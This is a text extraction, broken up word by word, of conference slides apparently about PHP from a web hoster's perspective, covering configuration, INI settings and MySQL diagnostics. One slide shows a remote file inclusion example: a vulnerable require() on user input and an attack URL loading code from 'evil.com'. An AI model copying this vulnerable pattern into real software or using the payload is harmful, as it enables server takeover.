5. I
live
in
the
wonderful
city
of
Bruges
MPBecker
-‐
Bruges
by
Night
hKp://www.flickr.com/photos/galverson2/3715965933
6. Follow
me
on
TwiKer:
@ThijsFeryn
Rate
my
talk:
hKp://joind.in/1541
Read
my
blog:
hKp://blog.feryn.eu
7.
8.
9. Chapter
I
:
The
hoster,
a
genuine
stakeholder
in
the
PHP
universe
10. Stakeholders
Customer Development
company
Endusers MGMT Devs MGMT Design PM
Internal Internal
IT PM Sales QA Systeam Consultants
Hoster PHP
community
11. Stakeholders
Somewhere
along
the
road
...
Your
app
needs
to
be
hosted
12. Goals
&
mo]ves
Our
goals
&
mo=ves
are
the
same
as
yours:
• It
has
to
work
• It
has
to
perform
• It
has
to
scale
• It
has
to
be
secure
• It
has
to
be
available
18. Installing
using
a
package
manager
(APT/Ap]tude)
Install
PHP:
server$
apt-‐get
install
php5
Install
MySQL
library
for
PHP:
server$
apt-‐get
install
php5-‐mysql
19. SAPI
...
schmapi
Mod_php FastCGI CLI
Web Apache
module gateway -‐
Process Apache
process php-‐cgi php
Configura=on Apache
conf
files wrapper on
the
fly
shell
user
or
User Apache
user shell
user
suexec
user
20. FastCGI
Example
config:
• Apache
handler
<IfModule
mod_fcgid.c>
SuexecUserGroup
dev
dev
PHP_Fix_Pathinfo_Enable
1
<Directory
/var/www/dev/www/>
Options
+ExecCGI
AllowOverride
All
AddHandler
fcgid-‐script
.php
FCGIWrapper
/var/www/dev/etc/fcgi.wrapper
.php
Order
allow,deny
Allow
from
all
</Directory>
</IfModule>
23. INI
se`ngs:
tales
of
good
&
evil
Defining
INI
seRngs:
• Php.ini
• Ini_set()
• “-‐d”
• php_value
• php_flag
• php_admin_value
• php_admin_flag
24. INI
se`ngs:
tales
of
good
&
evil
Memory_limit:
Fatal
error:
Allowed
memory
size
of
16777216
bytes
exhausted
(tried
to
allocate
35
bytes)
25.
26. INI
se`ngs:
tales
of
good
&
evil
Safe_mode
&
Open_basedir:
<IfModule
mod_php5.c>
php_admin_flag
engine
on
php_admin_flag
safe_mode
off
php_admin_value
open_basedir
"/var/www/vhosts/
website.com/httpdocs:/tmp"
</IfModule>
27. INI
se`ngs:
tales
of
good
&
evil
Allow_url_fopen:
<?php
$lang= $_GET['lang'];
require("$lang.php");
http://domain.ext/index.php?lang=http://evil.com/hack.txt?
30. PHP
4:
End
of
life,
but
far
from
dead
Parse
error:
syntax
error,
unexpected
T_STRING,
expecting
T_OLD_FUNCTION
or
T_FUNCTION
or
T_VAR
or
'}'
in
test.php
on
line
4
63. mysql>
explain
SELECT
field1,
(SELECT
COUNT(*)
FROM
table2
WHERE
field3
=
table1.id)
FROM
table1
WHERE
field2
=
1
ORDER
BY
field4
DESC
limit
12,12;
***************************
1.
row
***************************
id:
1
select_type:
PRIMARY
table:
table1
type:
ALL
possible_keys:
approved
key:
approved
key_len:
NULL
ref:
NULL
rows:
3143
Extra:
Using
where;
Using
filesort
***************************
2.
row
***************************
id:
2
select_type:
DEPENDENT
SUBQUERY
table:
table2
type:
ALL
possible_keys:
NULL
key:
NULL
key_len:
NULL
ref:
NULL
rows:
1005
Extra:
Using
where
64. mysql>
show
processlist;
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
|
Id
|
User
|
Host
|
db
|
Command
|
Time
|
State
|
Info
|
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
|
63515
|
root
|
localhost
|
db
|
Query
|
0
|
NULL
|
show
processlist
|
|
81763
|
root
|
localhost
|
db
|
Sleep
|
105
|
|
NULL
|
|
85187
|
root
|
localhost
|
db
|
Query
|
0
|
Sending
data
|
SELECT
data
from
someTable
where
field
=
'val'
|
|
82701
|
root
|
localhost
|
db
|
Query
|
0
|
Copying
to
tmp
table
|
SELECT
data
from
someTable
where
field='val2'
|
|
82709
|
root
|
localhost
|
db
|
Query
|
0
|
Sorting
result
|
SELECT
data
from
someTable
where
order
by
field
|
|
82716
|
root
|
localhost
|
db
|
Query
|
0
|
Opening
tables
|
SELECT
data
from
someOtherTable
|
+-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐
+-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐-‐+
72. Summary
1.Hosters
are
a
genuine
stakeholder
in
the
PHP
universe
2.PHP
is
highly
flexible
&
configurable.
Hosters
have
to
ensure
a
decent
setup
3.PHP
has
a
lot
to
offer
feature-‐wise
4.PHP
aDracts
a
crowd
and
brings
a
lot
of
people
together
from
different
industries
(e.g.
hosters)
5.Lots
of
abuse
cases
are
PHP
related,
but
that’s
not
the
fault
of
PHP
itself
6.PHP
itself
doesn’t
scale
*that*
well,
but
is
flexible
enough
to
ensure
scalability
via
extra
tools